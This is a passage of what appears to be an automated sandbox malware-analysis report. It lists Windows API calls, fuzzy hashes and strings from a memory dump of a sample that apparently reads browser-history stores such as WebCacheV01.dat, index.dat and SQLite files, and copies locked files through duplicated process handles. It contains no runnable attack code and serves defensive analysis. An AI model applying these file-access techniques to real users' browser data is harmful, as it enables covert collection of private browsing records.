• API String ID: 2936932814-4196376884
• Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
• Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
• Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
• Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
APIs
• GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
• FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
• LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
• SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
• LockResource.KERNEL32(00000000), ref: 0040B5DD
• memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
Strings
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
• String ID: BIN
• API String ID: 1668488027-1015027815
• Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
• Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
• Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
• Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
APIs
• memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
Strings
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: memcpy
• String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
• API String ID: 3510742995-2641926074
• Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
• Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                                                            • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                                                                            • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                                                            • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                                                                            • String ID: $0.@
                                                                                                                                                                                                                                            • API String ID: 2758756878-1896041820
                                                                                                                                                                                                                                            • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2941347001-0
                                                                                                                                                                                                                                            • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                                                                            • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                                            • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                            • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                            • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 669240632-0
                                                                                                                                                                                                                                            • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                                            • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                                            • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                                            • String ID: "%s"
                                                                                                                                                                                                                                            • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                                            • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                                            • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00408888
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
• String ID:
• API String ID: 2911713577-0
• Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
• Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
• Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
• Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
APIs
• memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
• memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
• memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
Strings
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: memcmp
• String ID: @ $SQLite format 3
• API String ID: 1475443563-3708268960
• Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
• Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
• Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
• Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
APIs
Strings
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: _wcsicmpqsort
• String ID: /nosort$/sort
• API String ID: 1579243037-1578091866
• Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
• Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
• Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
• Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
APIs
• memset.MSVCRT ref: 0040E60F
• memset.MSVCRT ref: 0040E629
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Strings
• Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
• Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: memsetwcslen$AttributesFilewcscatwcscpy
• String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
• API String ID: 3354267031-2114579845
• Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
• Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
• Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
• Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
APIs
• FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
• SizeofResource.KERNEL32(?,00000000), ref: 004148D4
• LoadResource.KERNEL32(?,00000000), ref: 004148E4
• LockResource.KERNEL32(00000000), ref: 004148EF
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
• Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
• Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
• Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
APIs
Strings
• only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: memset
• String ID: only a single result allowed for a SELECT that is part of an expression
• API String ID: 2221118986-1725073988
• Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
• Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
• Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
• Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
APIs
• ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
• DeleteObject.GDI32(00000000), ref: 004125E7
Strings
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: ??3@DeleteObject
• String ID: r!A
• API String ID: 1103273653-628097481
• Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
• Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
• Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
• Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
APIs
• ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
• ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ??2@
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1033339047-0
                                                                                                                                                                                                                                            • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                            • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                              • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                              • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                              • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                              • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                                                                                                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                              • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                                                                                                                                            • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                                                                                                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                              • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1979745280-0
                                                                                                                                                                                                                                            • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                                            • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 839530781-0
                                                                                                                                                                                                                                            • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                                            • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                                            • String ID: *.*$index.dat
                                                                                                                                                                                                                                            • API String ID: 1974802433-2863569691
                                                                                                                                                                                                                                            • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1156039329-0
                                                                                                                                                                                                                                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                                                                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
• Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
• Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
• Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
• Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
APIs
• Sleep.KERNEL32(00000064), ref: 004175D0
• CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
Strings
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
